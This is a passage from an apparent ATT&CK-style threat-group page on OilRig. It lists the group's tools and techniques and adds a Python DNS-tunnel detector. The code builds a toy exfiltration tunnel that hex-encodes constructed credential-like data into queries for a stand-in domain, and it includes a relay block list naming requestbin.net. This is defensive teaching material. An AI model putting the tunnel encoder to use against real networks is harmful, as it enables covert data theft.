Account Discovery : Domain Account , Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Data Encoding : Standard Encoding , File and Directory Discovery , Ingress Tool Transfer , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Process Discovery , Query Registry , Scheduled Task/Job : Scheduled Task , Screen Capture , Software Discovery : Security Software Discovery , System Information Discovery , System Network Configuration Discovery , System Network Connections Discovery , System Owner/User Discovery , Windows Management Instrumentation
S0029
PsExec
[17]
Create Account : Domain Account , Create or Modify System Process : Windows Service , Lateral Tool Transfer , Remote Services : SMB/Windows Admin Shares , System Services : Service Execution
S0269
QUADAGENT
[7]
Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Data Encoding : Standard Encoding , Deobfuscate/Decode Files or Information , Fallback Channels , Indicator Removal : File Deletion , Masquerading : Match Legitimate Resource Name or Location , Modify Registry , Obfuscated Files or Information : Command Obfuscation , Obfuscated Files or Information : Fileless Storage , Query Registry , Scheduled Task/Job : Scheduled Task , System Network Configuration Discovery , System Owner/User Discovery
S0495
RDAT
[32]
Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Application Layer Protocol : Mail Protocols , Command and Scripting Interpreter : Windows Command Shell , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Data Encoding : Non-Standard Encoding , Data Obfuscation : Steganography , Data Obfuscation , Data Transfer Size Limits , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Fallback Channels , Indicator Removal : File Deletion , Ingress Tool Transfer , Masquerading : Masquerade Task or Service , Masquerading : Match Legitimate Resource Name or Location , Obfuscated Files or Information : Steganography , Screen Capture
S0075
Reg
[4] [1]
Modify Registry , Query Registry , Unsecured Credentials : Credentials in Registry
S0258
RGDoor
[33]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Custom Method , Command and Scripting Interpreter : Windows Command Shell , Deobfuscate/Decode Files or Information , Ingress Tool Transfer , Server Software Component : IIS Components , System Owner/User Discovery
S1168
SampleCheck5000
[16]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Utility , Command and Scripting Interpreter : Windows Command Shell , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Exfiltration Over Web Service , Ingress Tool Transfer , Local Storage Discovery , System Information Discovery , Web Service : Bidirectional Communication
S0185
SEASHARPEE
[17]
Command and Scripting Interpreter : Windows Command Shell , Indicator Removal : Timestomp , Ingress Tool Transfer , Server Software Component : Web Shell
S0610
SideTwist
[10]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Windows Command Shell , Data Encoding : Standard Encoding , Data from Local System , Data Obfuscation , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Fallback Channels , File and Directory Discovery , Ingress Tool Transfer , Native API , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery
S1166
Solar
[16]
Automated Exfiltration , Data Encoding : Standard Encoding , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Indicator Removal : File Deletion , Ingress Tool Transfer , Scheduled Task/Job : Scheduled Task , System Information Discovery
S0096
Systeminfo
[1]
System Information Discovery
S0057
Tasklist
[4] [1]
Process Discovery , Software Discovery : Security Software Discovery , System Service Discovery
S1151
ZeroCleare
OilRig collaborated on the destructive portion of the ZeroCleare attack. [12]
Command and Scripting Interpreter , Command and Scripting Interpreter : PowerShell , Disk Wipe : Disk Structure Wipe , Exploitation for Privilege Escalation , Indicator Removal : File Deletion , Local Storage Discovery , Native API , Subvert Trust Controls : Code Signing
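DNS as a C2 and fallback channel runs through this page: Helminth, QUADAGENT, POWRUNER and RDAT list Application Layer Protocol: DNS, BONDUPDATER adds a domain generation algorithm, ISMAgent falls back to DNS tunneling when HTTP fails (T1008), and the group has used the requestbin.net relay (T1071.004). The Python below is an added example for this page, not MITRE's or any cited vendor's code. It generates a constructed query stream in which a payload is carried as hex-encoded chunks in the leftmost label (a generic tunnel shape, not any OilRig sample's real encoding), scores each registrable domain on distinct-subdomain count, mean label length and entropy, flags known relay services, and shows how a defender reassembles the carried bytes from the query log. The domains svc-update.test and example.com, the payload and the thresholds are constructed.

```python
"""Flag DNS query streams that look like tunnelled C2 or exfiltration, and
recover the bytes a flagged stream carried. Added example for this page; the
tunnel encoding, query log, domains and thresholds are constructed."""
import math
from collections import Counter, defaultdict

KNOWN_RELAY_SERVICES = {"requestbin.net"}  # named on this page; extend with your own list
PAYLOAD = b"host=WS01;user=j.doe;groups=domain admins,exchange trusted subsystem"  # constructed


def tunnel_queries(payload: bytes, parent: str, chunk: int = 8) -> list[str]:
    """Client side of a toy upstream tunnel: each query name carries a 4-hex-digit
    sequence number followed by one hex-encoded chunk of the payload."""
    n = -(-len(payload) // chunk)  # ceiling division
    return [f"{i:04x}{payload[i * chunk:(i + 1) * chunk].hex()}.{parent}" for i in range(n)]


def reassemble(qnames: list[str]) -> bytes:
    """Defender side: order the leftmost labels by sequence number and hex-decode."""
    labels = sorted(q.split(".", 1)[0] for q in qnames)
    return b"".join(bytes.fromhex(label[4:]) for label in labels)


def registrable(qname: str) -> str:
    """Last two labels; a real deployment should use the public suffix list."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def analyze(qnames: list[str], min_distinct: int = 8, min_label_len: int = 16) -> dict:
    """Per registrable domain: distinct names, mean leftmost-label length, entropy
    of the leftmost labels, and the reasons (if any) the domain is flagged."""
    by_parent: dict[str, set[str]] = defaultdict(set)
    for q in qnames:
        by_parent[registrable(q)].add(q.lower().rstrip("."))
    report = {}
    for parent, names in by_parent.items():
        leftmost = [n.split(".")[0] for n in names if n != parent]
        mean_len = sum(map(len, leftmost)) / len(leftmost) if leftmost else 0.0
        reasons = []
        if parent in KNOWN_RELAY_SERVICES:
            reasons.append("query to known request-relay/tunnelling service")
        if len(names) >= min_distinct and mean_len >= min_label_len:
            reasons.append(f"{len(names)} distinct subdomains, mean leftmost label {mean_len:.1f} chars")
        report[parent] = {
            "distinct": len(names),
            "mean_label_len": round(mean_len, 1),
            "entropy": round(shannon_entropy("".join(leftmost)), 2),
            "flagged": bool(reasons),
            "reasons": reasons,
        }
    return report


SAMPLE_QUERIES = (  # constructed log: ordinary browsing plus two suspicious streams
    ["www.example.com"] * 20 + ["mail.example.com"] * 5 + ["cdn.example.com"] * 3
    + tunnel_queries(PAYLOAD, "svc-update.test")
    + ["a1b2c3.requestbin.net"]
)

if __name__ == "__main__":
    for parent, info in analyze(SAMPLE_QUERIES).items():
        if info["flagged"]:
            print(parent, info)
    print(reassemble([q for q in SAMPLE_QUERIES if q.endswith(".svc-update.test")]))
```

Many distinct, long, never-repeated subdomains under one parent is the signature shared by hex/base32 tunnels and by DGAs that rotate through generated names; resolver logs or Sysmon Event ID 22 give you the query names, and a known-relay list catches the requestbin.net style of cheap infrastructure regardless of label shape.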
References
[1] Sardiwal, M., et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
[2] Falcone, R. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
[3] ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
[4] Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
[5] Grunzweig, J. and Falcone, R. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
[6] Unit 42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
[7] Lee, B. and Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
[8] Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
[9] Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
[10] Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
[11] Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
[12] Kessem, L. (2019, December 4). New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East. Retrieved September 4, 2024.
[13] Fahmy, M., et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.
[14] Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.
[15] Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.
[16] Hromcova, Z. and Burgher, A. (2023, September 21). OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes. Retrieved November 21, 2024.
[17] Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
[18] Bromiley, M., et al. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.
[19] Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.
[20] Lee, B. and Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
[21] Falcone, R. and Wilhoit, K. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.
[22] Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.
[23] Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024.
[24] CrowdStrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
[25] Hromcova, Z. and Burgher, A. (2023, December 14). OilRig’s persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
[26] McWhirt, M., Carr, N., and Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.
[27] Singh, S. and Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved November 17, 2024.
[28] Kovacs, E. (2018, May 21). Group Linked to Shamoon Attacks Targeting ICS Networks in Middle East and UK. Retrieved September 12, 2024.
[29] Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved November 19, 2019.
[30] Dragos. (n.d.). Chrysene. Retrieved October 27, 2019.
[31] Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
[32] Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
[33] Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.